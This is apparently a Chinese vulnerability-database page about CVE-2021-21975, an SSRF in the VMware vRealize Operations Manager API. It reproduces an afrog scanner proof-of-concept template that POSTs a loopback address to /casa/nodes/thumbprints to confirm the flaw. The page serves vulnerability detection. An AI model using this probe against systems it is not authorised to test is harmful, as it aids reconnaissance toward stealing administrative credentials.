CVE-2021-21975: vRealize Operations Manager API SSRF (VMWare Operations)

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.

PoC代码[已公开]

id: CVE-2021-21975

info:
  name: vRealize Operations Manager API SSRF (VMWare Operations)
  author: Loneyer
  severity: high
  description: |-
    Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2021-0022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21975
  tags: cve,cve2021,vmware,ssrf
  created: 2021/04/20

rules:
  r0:
    request:
      method: POST
      path: /casa/nodes/thumbprints
      headers:
        Content-Type: application/json
      body: |
        ["127.0.0.1:443/ui/"]
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager"))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-21975.yaml